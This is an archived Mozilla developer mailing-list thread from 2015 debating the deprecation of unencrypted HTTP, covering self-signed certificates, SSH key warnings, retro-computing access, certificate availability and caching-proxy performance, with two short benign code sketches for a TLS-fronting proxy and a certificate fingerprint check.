On Tuesday, April 14, 2015 at 5:39:24 AM UTC-7, Gervase Markham wrote: > On 14/04/15 01:57, northrupt...@gmail.com wrote: > > * Less scary warnings about self-signed certificates (i.e. treat > > HTTPS+selfsigned like we do with HTTP now, and treat HTTP like we do > > with HTTPS+selfsigned now); the fact that self-signed HTTPS is > > treated as less secure than HTTP is - to put this as politely and > > gently as possible - a pile of bovine manure > > http://gerv.net/security/self-signed-certs/ , section 3. That whole article is just additional shovelfuls of bovine manure slopped onto the existing heap. The article assumes that when folks connect to something via SSH and something changes - causing MITM-attack warnings and a refusal to connect - folks default to just removing the existing entry in ~/.ssh/known_hosts without actually questioning anything. This conveniently ignores the fact that - when people do this - it's because they already know there's been a change (usually due to a server replacement); most folks (that I've encountered at least) *will* stop and think before editing their known_hosts if it's an unexpected change. "The first important thing to note about this model is that key changes are an expected part of life." Only if they've been communicated first. In the vast majority of SSH deployments, a host key will exist at least as long as the host does (if not longer). If one is going to criticize SSH's model, one should, you know, actually freaking understand it first. "You can't provide [Joe Public] with a string of hex characters and expect it to read it over the phone to his bank." Sure you can. Joe Public *already* has to do this with social security numbers, credit card numbers, checking/savings account numbers, etc. on a pretty routine basis, whether it's over the phone, over the Internet, by mail, in person, or what have you. What makes an SSH fingerprint any different? The fact that now you have the letters A through F to read? Please. "Everyone can [install a custom root certificate] manually or the IT department can use the Client Customizability Kit (CCK) to make a custom Firefox." I've used the CCK in the past for Firefox customizations in enterprise settings. It's a royal pain in the ass, and is not nearly as viable a solution as the article suggests (and the alternate suggestion of "oh just use the broken, arbitrarily-trusted CA system for your internal certs!" is a hilarious joke at best; the author of the article would do better as a comedian than as a serious authority when it comes to security best practices). A better solution might be to do this on a client workstation level, but it's still a pain and usually not worth the trouble for smaller enterprises v. just sticking to the self-signed cert. The article, meanwhile, also assumes (in the section before the one you've cited) that the CA system is immune to being compromised while DNS is vulnerable. Anyone with a number of brain cells greater than or equal to one should know better than to take that assumption at face value. > But also, Firefox is implementing opportunistic encryption, which AIUI > gives you a lot of what you want here. > Gerv Then that needs to happen first. Otherwise, this whole discussion is moot, since absolutely nobody in their right mind would want to be shoehorned into our current broken CA system without at least *some* alternative.
On Tue, Apr 14, 2015 at 5:59 PM, <northrupthebandgeek@gmail.com> wrote: > On Tuesday, April 14, 2015 at 5:39:24 AM UTC-7, Gervase Markham wrote: > > But also, Firefox is implementing opportunistic encryption, which AIUI > > gives you a lot of what you want here. > > <snip> > Then that needs to happen first. Otherwise, this whole discussion is moot, since absolutely nobody in their right mind would want to be shoehorned into our current broken CA system without at least *some* alternative. OE shipped in Firefox 37. It's currently turned off pending a bugfix, but it will be back soon. --Richard > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
On 4/14/2015 4:59 PM, northrupthebandgeek@gmail.com wrote: > The article assumes that when folks connect to something via SSH and > something changes - causing MITM-attack warnings and a refusal to > connect - folks default to just removing the existing entry in > ~/.ssh/known_hosts without actually questioning anything. This > conveniently ignores the fact that - when people do this - it's > because they already know there's been a change (usually due to a > server replacement); most folks (that I've encountered at least) > *will* stop and think before editing their known_hosts if it's an > unexpected change. I've had an offending key at least 5 times. Only once did I seriously think to consider what specifically had changed to cause the ssh key to change. The other times, I assumed there was a good reason and deleted it. This illustrates a very, very, very important fact about UX: the more often people see a dialog, the more routine it becomes to deal with it--you stop considering whether or not it applies, because it's always applied and it's just yet another step you have to go through to do it. -- Joshua Cranmer Thunderbird and DXR developer Source code archæologist
On Tuesday, April 14, 2015 at 2:51:32 PM UTC-7, Cameron Kaiser wrote: > Candidly, and not because I still run such a site, I've always found > Gopher to be a better fit for resource-constrained computing. The > Commodore 128 sitting next to me does very well for that because the > protocol and menu parsing conventions are incredibly trivial. Certainly true on a "how well can it keep up?" level, but unfortunately precious few sites support Gopher these days, so while it may be a better fit it offers vastly more constricted access to online resources.
On 4/14/15 3:47 PM, commodorejohn@gmail.com wrote: > On Tuesday, April 14, 2015 at 2:51:32 PM UTC-7, Cameron Kaiser wrote: >> Candidly, and not because I still run such a site, I've always found >> Gopher to be a better fit for resource-constrained computing. The >> Commodore 128 sitting next to me does very well for that because the >> protocol and menu parsing conventions are incredibly trivial. > > Certainly true on a "how well can it keep up?" level, but unfortunately > precious few sites support Gopher these days, so while it may be a better > fit it offers vastly more constricted access to online resources. The counter argument is, of course, that the "modern Web" (however you define it) is effectively out of reach of computers older than a decade or so, let alone an 8-bit system, due to loss of vendor or browser support, or just plain not being up to the task. So even if they could access the pages, meaningfully displaying them is another thing entirely. I won't dispute the much smaller amount of content available in Gopherspace, but it's still an option that has *some* support, and that support is often in the retrocomputing community already. Graceful degradation went out the window a couple years back, unfortunately. Anyway, I'm derailing the topic, so I'll put a sock in it now. Cameron Kaiser
On 14/04/15 13:32, Eric Shepherd wrote: > My main concern with the notion of phasing out unsecured HTTP is that > doing so will cripple or eliminate Internet access by older devices that > aren't generally capable of handling encryption and decryption on such a > massive scale in real time. > > While it may sound silly, those of us who are intro classic computers > and making them do fun new things use HTTP to connect 10 MHz (or even 1 > MHz) machines to the Internet. These machines can't handle the demands > of SSL. So this is a step toward making their Internet connections go away. If this is important to you, then you could simply run them through a proxy. That's what jwz did when he wanted to get Netscape 1.0 running again: http://www.jwz.org/blog/2008/03/happy-run-some-old-web-browsers-day/ Gerv
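A toy sketch of the proxy approach: the retro machine is pointed at this script as its HTTP proxy on a modern box, which performs the TLS upstream on its behalf. Deliberately minimal (no keep-alive, no POST, no error handling), and every name in it is illustrative:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen

class TlsFrontingProxy(BaseHTTPRequestHandler):
    """Accept plain-HTTP proxy requests, fetch the target over HTTPS."""

    def do_GET(self):
        # A proxy-style request line carries the absolute URL; upgrade
        # the scheme so the upstream leg is encrypted.
        url = self.path.replace("http://", "https://", 1)
        with urlopen(url) as upstream:
            body = upstream.read()
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), TlsFrontingProxy).serve_forever()
```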
On 14/04/15 22:59, northrupthebandgeek@gmail.com wrote: > The article assumes that when folks connect to something via SSH and > something changes - causing MITM-attack warnings and a refusal to > connect - folks default to just removing the existing entry in > ~/.ssh/known_hosts without actually questioning anything. https://www.usenix.org/system/files/login/articles/105484-Gutmann.pdf > "The first important thing to note about this model is that key > changes are an expected part of life." > > Only if they've been communicated first. How does a website communicate with all its users that it is expecting to have (or has already had) a key change? After all, you can't exactly put a notice on the site itself... > "You can't provide [Joe Public] with a string of hex characters and > expect it to read it over the phone to his bank." > > Sure you can. Joe Public *already* has to do this with social > security numbers, credit card numbers, checking/savings account > numbers, etc. on a pretty routine basis, whether it's over the phone, > over the Internet, by mail, in person, or what have you. What makes > an SSH fingerprint any different? The fact that now you have the > letters A through F to read? Please. You have missed the question of motivation. I put up with reading a CC number over the phone (begrudgingly) because I know I need to do that in order to buy something. If I have a choice of clicking "OK" or phoning my bank, waiting in a queue, and eventually saying "Hi. I need to verify the key of your webserver's cert so I can log on to do my online banking. Is it 09F9.....?" then I'm just going to click "OK" (or "Whatever", as that button should be labelled). Gerv
On 14/04/15 17:46, jww@chromium.org wrote: > I just wanted to mention that regarding subresource integrity > (https://w3c.github.io/webappsec/specs/subresourceintegrity/), the > general consensus over here is that we will not treat origins as > secure if they are over HTTP but loaded with integrity. We believe > that security includes confidentiality, which that would approach > would lack. --Joel Radical idea: currently, the web has two states, insecure and secure. What if it still had two states, with the same UI, but insecure meant "HTTPS top-level, but some resources may be loaded using HTTP with integrity", and secure meant "HTTPS throughout"? That is to say, we don't have to tie the availability of new features to the same criteria as we tie the HTTP vs. HTTPS icon/UI in the browser. We could allow powerful features for HTTPS-top-level-and-some-HTTP-with-integrity, while still displaying it as insecure. Gerv
On Wed, Apr 15, 2015 at 11:50 AM, Gervase Markham <gerv@mozilla.org> wrote: > Radical idea: currently, the web has two states, insecure and secure. > What if it still had two states, with the same UI, but insecure meant > "HTTPS top-level, but some resources may be loaded using HTTP with > integrity", and secure meant "HTTPS throughout"? HTTPS already has mixed content, we should not make it worse. -- https://annevankesteren.nl/
On 15/04/15 10:59, Anne van Kesteren wrote: > HTTPS already has mixed content, we should not make it worse. What's actually wrong with mixed content? 1) The risk of content tampering. Subresource integrity makes that risk go away. 2) Reduced privacy. And that's why the connection would be marked as insecure in the UI. Gerv
On Wed, Apr 15, 2015 at 12:10 PM, Gervase Markham <gerv@mozilla.org> wrote: > 2) Reduced privacy. And that's why the connection would be marked as > insecure in the UI. We need to move away from HTTPS being able to go into an insecure state. We can't expect the user to keep an eye on the address bar the whole time. -- https://annevankesteren.nl/
If you're addicted to cleartext, the future is going to be hard for you... On Tue, Apr 14, 2015 at 2:26 PM, <connor.behan@gmail.com> wrote: > HTTPS has its moments, but the majority of the web does not need it. I certainly wouldn't appreciate the encryption overhead just for visiting David's lolcats website. As one of the most important organizations related to free software, it's sad to see Mozilla developers join the war on plaintext: http://arc.pasp.de/ The owners of websites like this have a right to serve their pages in formats that do not make hypocrites of themselves. > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform -- Joseph Lorenzo Hall Chief Technologist Center for Democracy & Technology 1634 I ST NW STE 1100 Washington DC 20006-4011 (p) 202-407-8825 (f) 202-637-0968 joe@cdt.org PGP: https://josephhall.org/gpg-key fingerprint: 3CA2 8D7B 9F6D DBD3 4B10 1607 5F86 6987 40A9 A871
On Wednesday, April 15, 2015 at 6:56:48 AM UTC-7, Joseph Lorenzo Hall wrote: > If you're addicted to cleartext, the future is going to be hard for you... Only because people like you insist on trying to push it across-the-board, rather than let webmasters make their own decisions.
On Wed, Apr 15, 2015 at 10:03 AM, <commodorejohn@gmail.com> wrote: > rather than let webmasters make their own decisions. I firmly disagree with your conclusion, but I think you have identified the central property that is changing. Traditionally transport security has been a unilateral decision of the content provider. Consumers could take it or leave it as content providers tried to guess what content was sensitive and what was not. They could never really know, of course. The contents of a public library are not private - but my reading history may or may not be. An indexed open source repository is not private - but my searching for symbols involved in a security bug may be. The content provider can't know a priori, and even if they do, they may not share the interests of the consumer. The decision is being made by the wrong party. The HTTPS web says that data consumers have the right to (at least transport) confidentiality and data integrity all of the time, regardless of the content. It is the act of consumption that needs to be protected as we go through our day to day Internet lives. HTTPS is certainly not perfect at doing this, but it's the best thing we've got. So yes, this is a consumer-first, rather than provider-first, policy. -Patrick
On 2015-04-15 10:03 AM, commodorejohn@gmail.com wrote: > On Wednesday, April 15, 2015 at 6:56:48 AM UTC-7, Joseph Lorenzo Hall wrote: >> If you're addicted to cleartrext, the future is going to be hard for you... > Only because people like you insist on trying to push it across-the-board, rather than let webmasters make their own decisions. Webmasters are already restricted in how they can run their services in many ways, some standards-based, some inherent to the web as we find it in the wild. For what it's worth I think that the fact that it is (at present) way more difficult to obtain, install, and update a certificate for a web server than it is to obtain, install and update a web server means that _mandating_ HTTPS would represent a real barrier to participation in a free and open Web. Having said that, "deprecated" clearly doesn't mean "prohibited", and the Let's Encrypt's "How It Works" page suggests that setting up a cert won't be all that difficult in the near future. So, while you may be right that the benefits here seem to be all client side and the up-front costs seem to be all server-side, it looks like work is well underway to reduce server-side costs to almost nothing. Moving from "TLS if the server wants to" to "TLS is what the client expects" is a meaningful change in incentive structure underneath web security, and sounds like the right thing to me. - mhoye * https://letsencrypt.org/howitworks/
Boris Zbarsky schrieb: > On 4/14/15 3:28 AM, Anne van Kesteren wrote: >> On Tue, Apr 14, 2015 at 4:10 AM, Karl Dubost <kdubost@mozilla.com> wrote: >>> 1. You do not need to register a domain name to have a Web site (IP >>> address) >> >> Name one site you visit regularly that doesn't have a domain name. > > My router's configuration UI. Here "regularly" is probably once a month > or so. > >> And even then, you can get certificates for public IP addresses. > > It's not a public IP address. > > We do need a solution for this space, which I expect includes the > various embedded devices people are bringing up; I expect those are > behind firewalls more often than on the publicly routable internet. Definitely. Right now, esp. those router configs and similar web interfaces to devices are in a very bad state - either they run unencrypted (most of them) or they can only go with self-signed certs with mostly-bogus domain descriptors, which is pretty bad as well, or the user needs to create a cert and install it into the device, which is too much hassle for the vast majority of people. Are there any good proposals on how to make those decently secure and keep them easy to use? KaiRo
northrupthebandgeek@gmail.com schrieb: > On Monday, April 13, 2015 at 8:26:59 PM UTC-7, ipar...@gmail.com wrote: >>> * Less scary warnings about self-signed certificates (i.e. treat HTTPS+selfsigned like we do with HTTP now, and treat HTTP like we do with HTTPS+selfsigned now); the fact that self-signed HTTPS is treated as less secure than HTTP is - to put this as politely and gently as possible - a pile of bovine manure >> >> I am against this. Both are insecure and should be treated as such. How is your browser supposed to know that gmail.com is intended to serve a self-signed cert? It's not, and it cannot possibly know it in the general case. Thus it must be treated as insecure. > > Except that one is encrypted, and the other is not. *By logical measure*, the one that is encrypted but unauthenticated is more secure than the one that is neither encrypted nor authenticated, and the fact that virtually every HTTPS-supporting browser assumes the precise opposite is mind-boggling. Right, the transport is encrypted, but it's completely unverified that you are accessing the actual machine you wanted to reach (i.e. there is no domain verification, which is what you need a 3rd-party system for, the CA system being the usual one in the TLS/web realm). You could just as much be connected to a MitM with that encrypted transport. KaiRo
northrupthebandgeek@gmail.com schrieb: > That whole article is just additional shovelfuls of bovine manure slopped onto the existing heap. Please refrain from language like that in lists like this if you want to be taken seriously. KaiRo
vic schrieb: > I would view this proposal favorably if 1) you didn't try to force people to adopt the One True Way and 2) the CA situation was fixed. Please define what alternatives to what you call the "One True Way" would be acceptable to you and still secure to access, and also what specific issues with the CA system you would want/need to see fixed. It's hard to discuss improvements when you are low on specifics. KaiRo
Yoav Weiss schrieb: > IMO, limiting new features to HTTPS only, when there's no real security > reason behind it, will only end up limiting feature adoption. > It directly "punishes" developers and adds friction to using new features, > but only influences business in a very indirect manner. That's my concern as well; I think we need to think very hard about what reasons people have to still not use TLS and how we can help them to do so. Let's Encrypt will be one step, easing one class of those reasons, but there's more. KaiRo
On Wed, Apr 15, 2015 at 5:20 PM, Robert Kaiser <kairo@kairo.at> wrote: > Are there any good proposals on how to make those decently secure and keep > them easy to use? I believe Chrome is experimenting with different UI for self-signed certificates when connecting to a local server. A good outline of the problem space is here: https://noncombatant.org/2014/10/12/brainstorming-security-for-the-internet-of-things/ -- https://annevankesteren.nl/
On Wed, Apr 15, 2015 at 10:44:35AM +0100, Gervase Markham wrote: > On 14/04/15 22:59, northrupthebandgeek@gmail.com wrote: > > The article assumes that when folks connect to something via SSH and > > something changes - causing MITM-attack warnings and a refusal to > > connect - folks default to just removing the existing entry in > > ~/.ssh/known_hosts without actually questioning anything. > > https://www.usenix.org/system/files/login/articles/105484-Gutmann.pdf That is somewhat discouraging, but I wonder what the conditions of these organizations are. At the very risky end you could ignore a key change you were not told of ahead of time for <my Chinese hosting provider>. On the other hand, if I'm sitting at my desk using my laptop and change the key for the sshd on my desktop, there isn't nearly as much risk in ignoring the key change my laptop sees. > > "The first important thing to note about this model is that key > > changes are an expected part of life." > > > > Only if they've been communicated first. > > How does a website communicate with all its users that it is expecting > to have (or has already had) a key change? After all, you can't exactly > put a notice on the site itself... Well, you can put up a notice while using the old cert, and in principle you can sign the new cert with the old one, similar to what you do when changing gpg keys. However, in the case where the old cert needs to be revoked, all users do need to go back to the out-of-band verification method. > > "You can't provide [Joe Public] with a string of hex characters and > > expect it to read it over the phone to his bank." > > > > Sure you can. Joe Public *already* has to do this with social > > security numbers, credit card numbers, checking/savings account > > numbers, etc. on a pretty routine basis, whether it's over the phone, > > over the Internet, by mail, in person, or what have you. What makes > > an SSH fingerprint any different? The fact that now you have the > > letters A through F to read? Please. > > You have missed the question of motivation. I put up with reading a CC > number over the phone (begrudgingly) because I know I need to do that in > order to buy something. If I have a choice of clicking "OK" or phoning > my bank, waiting in a queue, and eventually saying "Hi. I need to verify > the key of your webserver's cert so I can log on to do my online > banking. Is it 09F9.....?" then I'm just going to click "OK" (or > "Whatever", as that button should be labelled). I wonder if there's a reasonable way to make it hard to click "whatever", but fairly easy to say "I expect the fingerprint for the cert for foo.com is ab:cd:de:fg..." and, if that's correct, be satisfied that this is secure. As an aside, I personally find the manual comparison to be a pain even if I have both fingerprints easily available. Trev > > Gerv > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform
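On the "I expect the fingerprint for the cert for foo.com is ..." idea, the client side of that check is simple enough to sketch. The helper below (name and formatting are illustrative) fetches whatever certificate the server presents, with no CA validation, since the whole point is out-of-band comparison, and prints the colon-separated digest a user would read against a published value:

```python
import hashlib
import ssl

def cert_fingerprint(host: str, port: int = 443) -> str:
    """SHA-256 fingerprint of the server's certificate, formatted for
    manual, out-of-band comparison against a published value."""
    pem = ssl.get_server_certificate((host, port))
    der = ssl.PEM_cert_to_DER_cert(pem)
    digest = hashlib.sha256(der).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))

print(cert_fingerprint("example.com"))
# e.g. 5E:F2:F2:14:... (compare against the fingerprint the site
# published out of band before clicking through any warning)
```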
As Robert is saying: On 16 Apr. 2015 at 00:29, Robert Kaiser <kairo@kairo.at> wrote: > I think we need to think very hard about what reasons people have to still not use TLS and how we can help them to do so. Definitely. The resistance in this thread is NOT about "people against security", but 1. we want to be able to choose 2. if we choose safe, we want that choice to be easy to activate. # Drifting Socially, eavesdropping is part of our daily life. We go to a café, we are having a discussion, and people around you may listen to what you are saying. You read a book in the train, a newspaper, and people might see what you are reading. We adjust the type of discussions depending on the context. The café is too "dangerous", too "privacy invasive", and we decide to go to a safer environment; sometimes a safer environment is not necessarily being hidden (encryption), but being more public. As I said, contexts. (Note above my usage of the word safe and not secure) # Back to the topic It's important for the user to understand the weaknesses and the strengths of the environment so they can make a choice. You could almost imagine that you do not care to be plain text until a moment where you activate a secure mode. (change of place in the café) Also we need to think in terms of P2P communications, not only broadcaster-consumers (1-to-many). If the Web becomes something which is harder and harder to start hacking on and communicating with your peers, then we reinforce the power of big hierarchical structures and we change the balance that the Web brought over the publishing/media industry. We should always strive for bringing the tools that empower individual people with their ideas and expressions. Security is part of it. But security doesn't necessarily equate to safer. It's just a tool that can be used in some circumstances. Do we want to deprecate HTTP? Or do we want to make it more obvious when the connection is not secure? These are two very different things. -- Karl Dubost, Mozilla http://www.la-grange.net/karl/moz
On 16/04/15 02:13, Karl Dubost wrote: > Definitely. The resistance in this thread is NOT about "people > against security", but 1. we want to be able to choose 2. if we > choose safe, we want that choice to be easy to activate. I'd have it the other way. If you even assume choice should be possible then: 1) We want to be able to choose 2) If we choose unsafe, we want that choice to be relatively hard to activate. In other words, "safe" should be the default. Gerv
I expressed my opinion on this subject at length on the Chrome lists when they made a similar proposal. I'll summarize it here, though, since I feel the same way about FF deprecating non-encrypted HTTP:

I think HTTPS-everywhere is a great ideal if we can achieve it, but in the vast majority of discussions it feels like people are underestimating the difficulties involved in deploying HTTPS in production. In particular, I think this puts a significant group of people at risk, and they don't necessarily have the ability to advocate for themselves in environments like this. Low-income internet users, teenagers, and people in less-developed nations are more likely to be dependent on inexpensive-or-free services to put content up on the internet. In the best case they might have a server of their own they can configure for HTTPS (given sufficient public documentation & time), but the task of getting a certificate is a huge hurdle. I've acquired personal certificates in the past through the normal paid CA pipeline, and the experience was bad enough as someone who lives in Silicon Valley and can afford a certificate.

There are some steps being taken to reduce the difficulty here, and I think that's a good start. StartSSL offers free certs, and that's wonderful (aside from the fact that their OCSP servers broke and took down a portion of the web the other day...), and if letsencrypt ships it seems like it could be a comprehensive solution to the problem. If unencrypted HTTP is deprecated it *must* be not only simple for individuals to acquire a certificate, but it shouldn't require them to interact with western governments/business regulations, and it shouldn't require them to compromise anonymity. Anonymity is an important feature of web services and especially important for disadvantaged people. Unencrypted pages mean that visitors are potentially at risk and their sites can be MITMd, but a MITM is at least not going to expose their real name or real identity and put them at risk from attack. Past security breaches at various internet services & businesses suggest that if an individual has to provide identifying information to a CA - even if it is promised to be kept private - they are putting themselves at risk. Letsencrypt seems to avoid this requirement, so I look forward to it launching in the near future.

I also think there are potential negative consequences to deprecating HTTP if the process of rolling out HTTPS is prohibitively difficult for amateur/independent developers: In practice it may force many of them to move to hosting their content on third-party servers/services that provide HTTPS, which puts them at risk of having their content tampered with or pulled by the service provider. In this scenario I'm not sure we've won anything, because we've made the site look secure when in fact we've simplified the task of altering site content without the author or visitor's knowledge.
On Wed, Apr 15, 2015 at 9:13 PM, Karl Dubost <kdubost@mozilla.com> wrote:
> As Robert is saying:
>
> On 16 Apr 2015 at 00:29, Robert Kaiser <kairo@kairo.at> wrote:
> > I think we need to think very hard about what reasons people have to
> > still not use TLS and how we can help them to do so.
>
> Definitely.
> The resistance in this thread is NOT about "people against security", but
> 1. we want to be able to choose
> 2. if we choose safe, we want that choice to be easy to activate.

Please see McManus's argument for why putting all the choice in webmasters' hands is not really the best option for today's web.

> # Drifting
>
> Socially, eavesdropping is part of our daily life. We go to a café, we are having a discussion, and people around you may listen to what you are saying. You read a book in the train, a newspaper, and people might see what you are reading.
>
> We adjust the type of discussions depending on the context. The café is too "dangerous", too "privacy invasive", and we decide to go to a safer environment; sometimes a safer environment is not necessarily being hidden (encryption), but being more public. As I said, contexts.
>
> (Note above my usage of the word safe and not secure)

Of course, in the café, you can evaluate who has access to your communication -- you can look around and see. When you load a web page, your session traverses, on average, four different entities [1], any of whom can subvert your communications. The user has no visibility into this path, not least because it often can't be predicted in advance. You're in the UK, talking to a server in Lebanon. Does your path traverse France? Possibly! (Probably!)

The idea that the user can evaluate the trustworthiness of every ISP between his computer and a web server seems pretty outlandish. Maybe in some limited development or enterprise environments, but certainly not for the general web.

> # Back to the topic
>
> It's important for the user to understand the weaknesses and the strengths of the environment so they can make a choice. You could almost imagine that you do not care about being plain text until a moment where you activate a secure mode. (change of place in the café)
>
> Also we need to think in terms of P2P communications, not only broadcaster-consumers (1-to-many). If the Web becomes something which is harder and harder to start hacking on and communicating with your peers, then we reinforce the power of big hierarchical structures, and we change the balance that the Web brought over the publishing/media industry. We should always strive for bringing the tools that empower individual people with their ideas and expressions.
>
> Security is part of it. But security doesn't necessarily equate to safer. It's just a tool that can be used in some circumstances.
>
> Do we want to deprecate HTTP? Or do we want to make it more obvious when the connection is not secure? These are two very different things.

http://i.imgur.com/c7NJRa2.gif

--Richard

[1] http://bgp.potaroo.net/as6447/
[2] http://www.lemonde.fr/pixels/article/2015/04/16/les-deputes-approuvent-un-systeme-de-surveillance-du-trafic-sur-internet_4616652_4408996.html

> --
> Karl Dubost, Mozilla
> http://www.la-grange.net/karl/moz
Hey Katelyn,

Thanks for bringing up these considerations.

On Thu, Apr 16, 2015 at 5:35 AM, Katelyn Gadd <kg@luminance.org> wrote:
> I think HTTPS-everywhere is a great ideal if we can achieve it, but in the vast majority of discussions it feels like people are underestimating the difficulties involved in deploying HTTPS in production. In particular, I think this puts a significant group of people at risk and they don't necessarily have the ability to advocate for themselves in environments like this. Low-income internet users, teenagers, and people in less-developed nations are more likely to be dependent on inexpensive-or-free services to put content up on the internet. In the best case they might have a server of their own they can configure for HTTPS (given sufficient public documentation & time) but the task of getting a certificate is a huge hurdle. I've acquired personal certificates in the past through the normal paid CA pipeline and the experience was bad enough as someone who lives in Silicon Valley and can afford a certificate.

Let me try to disentangle two threads here:

1. "Zero-rated" services [1]. These are services where the carrier agrees not to charge the user for data to access certain web sites. Obviously, these can play an important role for carriers in developing economies especially. HTTPS can have an impact here, since it prevents the carrier from seeing anything beyond the hostname that the user is connecting to. I would observe, however, that (1) most zero-rating is done on a hostname basis anyway, and (2) even if more granularity is desired, there are solutions for this that don't involve DPI, e.g., having the zero-rated site send a ping to the carrier in JS.

2. Requirement for free/inexpensive/hobbyist services to get certificates. Examples of free certificate services have been given several times in this thread. Several hosting platforms already offer HTTPS helper tools. And overall, I think the trend is toward greater usability. So the situation is pretty OK (not great) today, and it's getting better. If we think of this HTTP deprecation plan not as something we're doing today, but something we'll be doing over the next few years, it seems like deprecating HTTP and improved HTTPS deployability can develop together.

> There are some steps being taken to reduce the difficulty here, and I think that's a good start. StartSSL offers free certs, and that's wonderful (aside from the fact that their OCSP servers broke and took down a portion of the web the other day...) and if letsencrypt ships it seems like it could be a comprehensive solution to the problem. If unencrypted HTTP is deprecated it *must* be not only simple for individuals to acquire a certificate, but it shouldn't require them to interact with western governments/business regulations, and it shouldn't require them to compromise anonymity. Anonymity is an important feature of web services and especially important for disadvantaged people. Unencrypted pages mean that visitors are potentially at risk and their sites can be MITMd, but a MITM is at least not going to expose their real name or real identity and put them at risk from attack. Past security breaches at various internet services & businesses suggest that if an individual has to provide identifying information to a CA - even if it is promised to be kept private - they are putting themselves at risk. Letsencrypt seems to avoid this requirement so I look forward to it launching in the near future.

I'm not sure what the state of the art with StartCom is, but when I got a certificate from WoSign the other day [2], they didn't require any identification besides an email address. As far as I know, Let's Encrypt will require about the same level of information. There's certainly nothing about the standards or norms for the web PKI that requires CAs to collect identifying information about applicants for certificates.

> I also think there are potential negative consequences to deprecating HTTP if the process of rolling out HTTPS is prohibitively difficult for amateur/independent developers: In practice it may force many of them to move to hosting their content on third-party servers/services that provide HTTPS, which puts them at risk of having their content tampered with or pulled by the service provider. In this scenario I'm not sure we've won anything because we've made the site look secure when in fact we've simplified the task of altering site content without the author or visitor's knowledge.

Maybe I'm coming from a position of privilege here, but the difficulty of setting up HTTPS seems exaggerated to me. Mozilla already provides an HTTPS config generator [3], and I know Let's Encrypt is already having some conversations with platform vendors about adding more automation to HTTPS config.

--Richard

[1] http://en.wikipedia.org/wiki/Zero-rating
[2] https://buy.wosign.com/free/
[3] https://mozilla.github.io/server-side-tls/ssl-config-generator/
As a non-tech person, the only thing I know is https means my browser runs even slower on DSL, which is all that is available in many rural areas. Would this not mean that I'd be back to dial-up times to load a story or post, all of which are larded up with ads and videos these days? At 7 Mbps tops, my browsing is already difficult.

Meanwhile: "Deprecate" it?? Has anyone in the tech community used an English dictionary? To deprecate HTTP would mean to speak badly of it. Or disapprove of it. I think you mean you want to abolish it, pressure it out of existence, or create a disincentive to use it.
On Fri, Apr 17, 2015 at 6:13 PM, <andrewnemethy@gmail.com> wrote:
> As a non-tech person, the only thing I know is https means my browser runs even slower on DSL.

This has already been addressed earlier in the thread. HTTPS has negligible performance impact. See e.g.:

https://istlsfastyet.com/

> Meanwhile: "Deprecate" it?? Has anyone in the tech community used an English dictionary?

http://en.wikipedia.org/wiki/Deprecation#Software_deprecation

--
https://annevankesteren.nl/
On 2015-04-17 12:20 PM, Anne van Kesteren wrote:
> This has already been addressed earlier in the thread. HTTPS has
> negligible performance impact. See e.g.:
>
> https://istlsfastyet.com/

I don't see where that document speaks to the impact of TLS on caching proxies, which I'm guessing is the source of the performance hit Andrew mentions.

It's been a while since I've looked, but in Canada (and probably other geographically large countries) the telcos/ISPs with large exurban/rural client bases used to use caching proxies a lot.

- mhoye
On 04/17/2015 09:46 AM, Mike Hoye wrote:
> I don't see where that document speaks to the impact of TLS on caching
> proxies, which I'm guessing is the source of the performance hit Andrew
> mentions.
>
> It's been a while since I've looked, but in Canada (and probably other
> geographically large countries) the telcos/ISPs with large exurban/rural
> client bases used to use caching proxies a lot.

From my past experience with satellite-based connections, https was appreciably slower than http. I don't know how much of the effect was due to the loss of the caching proxy or how much was due to the latency+handshake issue. This was also several years ago, and I don't have experience with the improved networking in Firefox over satellite.

In third world countries, such as the United States, many people in rural areas are limited to satellite-based connections and may be adversely affected by the move to encrypted connections. This isn't to say we shouldn't move to encryption, just that the network experience in major metropolitan areas isn't indicative of what someone in rural Virginia might experience, for example.

/bc
On Fri, Apr 17, 2015 at 6:46 PM, Mike Hoye <mhoye@mozilla.com> wrote:
> I don't see where that document speaks to the impact of TLS on caching
> proxies, which I'm guessing is the source of the performance hit Andrew
> mentions.
>
> It's been a while since I've looked, but in Canada (and probably other
> geographically large countries) the telcos/ISPs with large exurban/rural
> client bases used to use caching proxies a lot.

As I said early on in this thread, this claim often comes up, but is never backed up. Where is the research that shows we need public caching proxies?

--
https://annevankesteren.nl/
On Fri, Apr 17, 2015 at 11:22 AM, Anne van Kesteren <annevk@annevk.nl> wrote:
> As I said early on in this thread, this claim often comes up, but is
> never backed up. Where is the research that shows we need public
> caching proxies?

This is early days, but I'm working with a partner on two things:

- working out how to cache https resources
- working out if it's worthwhile doing

I can share what material I have on the topic; it's very rough right now and we have no actual data, but I expect the project to be in better shape as things progress. This is all part of the overall plan to make HTTPS as usable as possible.

The latter question is a real concern, but we won't know until we go and collect some data. When we get measurements for these sorts of things, it's usually from services that have the resources to acquire the measurements. At the same time, those services likely have the resources to have a CDN and so probably will have less need for caches.
> The latter question is a real concern, but we won't know until we go
> and collect some data. When we get measurements for these sorts of
> things, it's usually from services that have the resources to acquire
> the measurements. At the same time, those services likely have the
> resources to have a CDN and so probably will have less need for
> caches.

It seems the right people to work with on this are the people at rural/edge/mobile ISPs, as these are the people who will know the size of their caches, the hit rates, the amount of bandwidth they take off their transit links, and the amount of money they'd have to raise from their customers to pay for increased peering/transit costs if their caching proxies all broke (extrapolated out over the expected transition time, of course).

Providers of web services themselves don't seem in a good position to calculate the value of caching http proxies, as they aren't the ones benefiting except in an indirect latency-based way.
On 18/04/2015 00:13, andrewnemethy@gmail.com wrote:
> Meanwhile: "Deprecate" it?? Has anyone in the tech community used an
> English dictionary? To deprecate Http would mean to speak badly of
> it. Or disapprove of it. I think you mean you want to abolish it,
> pressure it out of existence, or create a disincentive to use it.

"Deprecate" is a term of art in the IT world.

http://en.wikipedia.org/wiki/Deprecation
http://www.thefreedictionary.com/deprecated
